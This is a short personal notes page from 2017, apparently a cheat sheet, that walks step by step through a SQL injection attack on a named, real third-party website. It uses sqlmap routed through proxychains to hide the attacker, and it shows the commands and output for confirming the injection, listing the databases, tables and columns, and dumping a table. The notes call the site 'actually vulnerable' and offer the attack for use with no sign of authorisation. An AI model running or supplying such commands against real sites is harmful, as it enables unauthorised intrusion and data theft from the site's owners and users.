Created Thursday 07 December 2017
# Remember to use with Proxychains
# A great SQL injection automation tool
$ pacman -S sqlmap
# Find insecure web servers with the classic URL trick - to set a double/single quote in the URL
# Ex;
www.example.com?id=1'
Example Usage
# At the time of writing this, the following site is actually vulnerable
# http://www.romanianwriters.ro/s.php?id=1
Confirm Vulnerable
# Perform a scan against an URL with -u
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1"
Discover Databases
# It will return, through its responses, that some places are injectable
# Now that we now the server is vulnerable, we can discover its database with --dbs
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --dbs
# From the response I can see two tables are available;
- information_schema
- romanian_svc
Tables
# Let's look further into the romanian_svc database
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --tables -D romanian_svc
# Here's the table response
[11 tables]
+------------------+
| ra_autori |
| ra_carti |
| ra_carti_autori |
| ra_carti_critics |
| ra_carti_pdf |
| ra_contact |
| ra_news |
| ra_news_pics |
| ra_sigle |
| ra_statics |
| ra_statics_pics |
+------------------+
Columns
# Now let's have a look into a column, ra_carti_critics f.ex
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --columns -D romanian_svc -T ra_carti_critics
# And the response
+----------+--------------+
| Column | Type |
+----------+--------------+
| critic | varchar(240) |
| critic2 | varchar(240) |
| id | int(11) |
| id_carte | int(11) |
| text | text |
+----------+--------------+
Dump
# Let's have a look at the actual data
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --dump -D romanian_svc -T ra_carti_critics
# Now, don't actually fire the above command - it's just a shitload of crappy content for their website
# But the execution is there^